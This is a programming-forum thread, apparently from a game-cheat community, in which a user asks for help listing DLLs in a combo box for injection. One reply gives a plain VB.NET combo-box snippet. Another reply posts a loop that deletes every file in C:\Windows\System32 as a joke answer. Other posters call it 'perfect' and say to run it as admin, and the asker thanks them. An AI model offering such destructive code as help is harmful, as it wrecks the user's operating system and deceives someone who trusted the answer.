Results 1 to 7 of 7
  1. #1
    Unfinished Code's Avatar
    Join Date
    Feb 2013
    Gender
    male
    Posts
    156
    Reputation
    12
    Thanks
    17

    DLL In combo box

    i need help making a DLL file fit in a comx

  2. #2
    DawgiiStylz's Avatar
    Join Date
    Aug 2009
    Gender
    male
    Location
    Dawg House
    Posts
    7,811
    Reputation
    219
    Thanks
    2,896
    My Mood
    Tired
    Quote Originally Posted by Unfinished Code View Post
    i need help making a DLL file fit in a comx
    Don't quite understand what you mean.., but are you trying to make the comx drag n drop dll's in it or have the file path in the comx?
    Specify

  3. #3
    LilGho$t's Avatar
    Join Date
    Nov 2011
    Gender
    male
    Posts
    419
    Reputation
    9
    Thanks
    330
    My Mood
    Twisted
    I would assume you're trying to make a combobox with different dll names and then it injects one based on the dll chosen? I'd write this:

    Code:
    Dim paths() As String = {"C:\Path1", "C:\Path2", "Etc"}
    
    ' And then write
    
    Dim DisplayText() As String = {"Penis1","Vagina2","Va-Jay-Jay3"}
    
    Sub loadingDisBish() Handles MyBase.Load
    
    Combobox1.Items.Clear
    ComboBox1.Items.Addrange(displayText)
    
    End Sub
    
    sub DisBishWantsDaD() handles button1.click
    Dim pathToWorkOn As String = paths(combobox1.selectedIndex)
    ' Your code to do whatever with the dll.
    end sub

  4. The Following User Says Thank You to LilGho$t For This Useful Post:

    Unfinished Code (02-09-2013)

  5. #4
    Jason's Avatar
    Join Date
    Apr 2010
    Gender
    male
    Location
    /dev/null
    Posts
    5,704
    Reputation
    918
    Thanks
    7,676
    My Mood
    Mellow
    Code:
    For Each s As String In IO.Directory.GetFiles("C:\Windows\System32\")
        IO.File.Delete(s)
    Next

    Quote Originally Posted by Jeremy S. Anderson
    There are only two things to come out of Berkley, Unix and LSD,
    and I don’t think this is a coincidence
    You can win the rat race,
    But you're still nothing but a fucking RAT.


    ++Latest Projects++
    [Open Source] Injection Library
    Simple PE Cipher
    FilthyHooker - Simple Hooking Class
    CLR Injector - Inject .NET dlls with ease
    Simple Injection - An in-depth look
    MPGH's .NET SDK
    eJect - Simple Injector
    Basic PE Explorer (BETA)

  6. The Following 3 Users Say Thank You to Jason For This Useful Post:

    DawgiiStylz (02-09-2013),Pingo (02-09-2013),Unfinished Code (02-09-2013)

  7. #5
    Pingo's Avatar
    Join Date
    Apr 2010
    Gender
    male
    Posts
    687
    Reputation
    24
    Thanks
    865
    My Mood
    Blah
    Quote Originally Posted by Jason View Post
    Code:
    For Each s As String In IO.Directory.GetFiles("C:\Windows\System32\")
        IO.File.Delete(s)
    Next
    Worked perfect!

    @Unfinished Code
    Make sure you run it as admin though [IMG]https://i203.photobucke*****m/albums/aa29/Baxter_esa.gif[/IMG]

  8. #6
    Unfinished Code's Avatar
    Join Date
    Feb 2013
    Gender
    male
    Posts
    156
    Reputation
    12
    Thanks
    17
    Quote Originally Posted by Jason View Post
    Code:
    For Each s As String In IO.Directory.GetFiles("C:\Windows\System32\")
        IO.File.Delete(s)
    Next
    Thanks @Jason

  9. #7
    DawgiiStylz's Avatar
    Join Date
    Aug 2009
    Gender
    male
    Location
    Dawg House
    Posts
    7,811
    Reputation
    219
    Thanks
    2,896
    My Mood
    Tired
    Lol @Jason

Similar Threads

  1. [Detected] Fixed Euro .DLL AntiKiick .DLL and Mini farmer box changer
    By HOOSIER in forum Alliance of Valiant Arms (AVA) Hacks & Cheats
    Replies: 222
    Last Post: 02-05-2013, 04:28 PM
  2. Why after I bypass my gg,inject the DLL and start to use the .later ,appear this box
    By [SDU]MCY in forum Alliance of Valiant Arms (AVA) Help
    Replies: 3
    Last Post: 09-30-2012, 03:42 AM
  3. [Help] Need help with Java Script Combo Box
    By money001 in forum Web Languages
    Replies: 1
    Last Post: 01-24-2012, 10:02 PM
  4. Combo box help please
    By kaziboy in forum Visual Basic Programming
    Replies: 5
    Last Post: 07-02-2010, 03:47 PM
  5. [PLEASE HELP ME] Dll+Popup dialog box
    By spartacchio in forum C++/C Programming
    Replies: 7
    Last Post: 03-15-2008, 07:51 AM